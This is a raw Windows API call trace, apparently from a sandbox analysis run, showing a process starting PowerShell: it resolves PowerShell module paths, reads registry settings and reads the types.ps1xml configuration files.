	[0467.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.084] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0467.084] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0467.084] CoTaskMemFree (pv=0x484630) 
	[0467.085] CoTaskMemAlloc (cb=0xcc) returned 0x1b82c210
	[0467.085] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b82c210, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0467.086] CoTaskMemFree (pv=0x1b82c210) 
	[0467.086] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed768 | out: phkResult=0x1ed768*=0x318) returned 0x0
	[0467.086] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed6ec, lpData=0x0, lpcbData=0x1ed6e8*=0x0 | out: lpType=0x1ed6ec*=0x2, lpData=0x0, lpcbData=0x1ed6e8*=0x6c) returned 0x0
	[0467.086] CoTaskMemAlloc (cb=0x70) returned 0x447ef0
	[0467.086] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed6bc, lpData=0x447ef0, lpcbData=0x1ed6b8*=0x6c | out: lpType=0x1ed6bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ed6b8*=0x6c) returned 0x0
	[0467.086] CoTaskMemFree (pv=0x447ef0) 
	[0467.086] CoTaskMemAlloc (cb=0xcc) returned 0x1b82c210
	[0467.086] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b82c210, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0467.086] CoTaskMemFree (pv=0x1b82c210) 
	[0467.086] CoTaskMemAlloc (cb=0xcc) returned 0x1b82c210
	[0467.086] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b82c210, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0467.086] CoTaskMemFree (pv=0x1b82c210) 
	[0467.090] RegCloseKey (hKey=0x318) returned 0x0
	[0467.090] CoTaskMemAlloc (cb=0xcc) returned 0x1b82c210
	[0467.090] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b82c210, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0467.091] CoTaskMemFree (pv=0x1b82c210) 
	[0467.091] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed768 | out: phkResult=0x1ed768*=0x318) returned 0x0
	[0467.091] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed6ec, lpData=0x0, lpcbData=0x1ed6e8*=0x0 | out: lpType=0x1ed6ec*=0x0, lpData=0x0, lpcbData=0x1ed6e8*=0x0) returned 0x2
	[0467.091] RegCloseKey (hKey=0x318) returned 0x0
	[0467.097] CoTaskMemAlloc (cb=0x20c) returned 0x48e470
	[0467.097] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x48e470 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0467.551] CoTaskMemFree (pv=0x48e470) 
	[0467.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0467.552] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0467.562] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0467.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.562] CoTaskMemFree (pv=0x484630) 
	[0467.565] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0467.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.565] CoTaskMemFree (pv=0x484630) 
	[0467.568] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0467.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.568] CoTaskMemFree (pv=0x484630) 
	[0467.568] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0467.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0467.568] CoTaskMemFree (pv=0x484630) 
	[0467.570] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed558 | out: phkResult=0x1ed558*=0x320) returned 0x0
	[0467.571] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ed56c, lpData=0x0, lpcbData=0x1ed568*=0x0 | out: lpType=0x1ed56c*=0x1, lpData=0x0, lpcbData=0x1ed568*=0x74) returned 0x0
	[0467.571] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ed4dc, lpData=0x0, lpcbData=0x1ed4d8*=0x0 | out: lpType=0x1ed4dc*=0x1, lpData=0x0, lpcbData=0x1ed4d8*=0x74) returned 0x0
	[0467.572] CoTaskMemAlloc (cb=0x78) returned 0x447ef0
	[0467.572] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ed4ac, lpData=0x447ef0, lpcbData=0x1ed4a8*=0x74 | out: lpType=0x1ed4ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed4a8*=0x74) returned 0x0
	[0467.572] CoTaskMemFree (pv=0x447ef0) 
	[0467.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ed220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0467.572] SetErrorMode (uMode=0x1) returned 0x1
	[0467.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed430 | out: lpFileInformation=0x1ed430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0467.572] SetErrorMode (uMode=0x1) returned 0x1
	[0467.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0467.575] SetErrorMode (uMode=0x1) returned 0x1
	[0467.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed430 | out: lpFileInformation=0x1ed430*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0467.575] SetErrorMode (uMode=0x1) returned 0x1
	[0467.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0467.579] SetErrorMode (uMode=0x1) returned 0x1
	[0467.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed430 | out: lpFileInformation=0x1ed430*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0467.580] SetErrorMode (uMode=0x1) returned 0x1
	[0468.084] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0468.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0468.085] CoTaskMemFree (pv=0x484630) 
	[0468.092] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0468.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0468.092] CoTaskMemFree (pv=0x484630) 
	[0468.093] GetACP () returned 0x4e4
	[0468.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0468.101] SetErrorMode (uMode=0x1) returned 0x1
	[0468.101] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0468.102] GetFileType (hFile=0x324) returned 0x1
	[0468.102] SetErrorMode (uMode=0x1) returned 0x1
	[0468.102] GetFileType (hFile=0x324) returned 0x1
	[0468.103] ReadFile (in: hFile=0x324, lpBuffer=0x2f1fe40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2f1fe40*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0468.106] ReadFile (in: hFile=0x324, lpBuffer=0x2f1fe40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2f1fe40*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0468.106] ReadFile (in: hFile=0x324, lpBuffer=0x2f1fe40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2f1fe40*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0468.106] ReadFile (in: hFile=0x324, lpBuffer=0x2f1fe40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2f1fe40*, lpNumberOfBytesRead=0x1ed368*=0xcf3, lpOverlapped=0x0) returned 1
	[0468.106] ReadFile (in: hFile=0x324, lpBuffer=0x2f1f29b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2f1f29b*, lpNumberOfBytesRead=0x1ed368*=0x0, lpOverlapped=0x0) returned 1
	[0468.106] ReadFile (in: hFile=0x324, lpBuffer=0x2f1fe40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2f1fe40*, lpNumberOfBytesRead=0x1ed368*=0x0, lpOverlapped=0x0) returned 1
	[0468.109] CloseHandle (hObject=0x324) returned 1
	[0468.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0468.114] SetErrorMode (uMode=0x1) returned 0x1
	[0468.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed2e0 | out: lpFileInformation=0x1ed2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0468.114] SetErrorMode (uMode=0x1) returned 0x1
	[0468.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0468.116] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed3c8 | out: phkResult=0x1ed3c8*=0x324) returned 0x0
	[0468.116] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed34c, lpData=0x0, lpcbData=0x1ed348*=0x0 | out: lpType=0x1ed34c*=0x1, lpData=0x0, lpcbData=0x1ed348*=0x56) returned 0x0
	[0468.116] CoTaskMemAlloc (cb=0x5a) returned 0x1b82eea0
	[0468.116] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed31c, lpData=0x1b82eea0, lpcbData=0x1ed318*=0x56 | out: lpType=0x1ed31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed318*=0x56) returned 0x0
	[0468.116] CoTaskMemFree (pv=0x1b82eea0) 
	[0468.116] RegCloseKey (hKey=0x324) returned 0x0
	[0468.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0468.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0468.675] VirtualQuery (in: lpAddress=0x1ec0b0, lpBuffer=0x1ecf70, dwLength=0x30 | out: lpBuffer=0x1ecf70*(BaseAddress=0x1ec000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0469.144] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0469.144] GetFileType (hFile=0x320) returned 0x1
	[0469.144] SetErrorMode (uMode=0x1) returned 0x1
	[0469.144] GetFileType (hFile=0x320) returned 0x1
	[0469.144] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.145] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.145] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.145] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.146] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.146] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.146] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.146] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.146] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.147] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.147] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.148] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.148] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.148] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.148] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.149] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.149] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.150] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.150] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.150] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.151] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.151] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.151] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.151] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.151] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.152] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.152] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.152] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.152] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.153] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.153] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.153] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.153] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.155] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
	[0469.156] ReadFile (in: hFile=0x320, lpBuffer=0x2e04e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed368, lpOverlapped=0x0 | out: lpBuffer=0x2e04e70*, lpNumberOfBytesRead=0x1ed368*=0x1000, lpOverlapped=0x0) returned 1
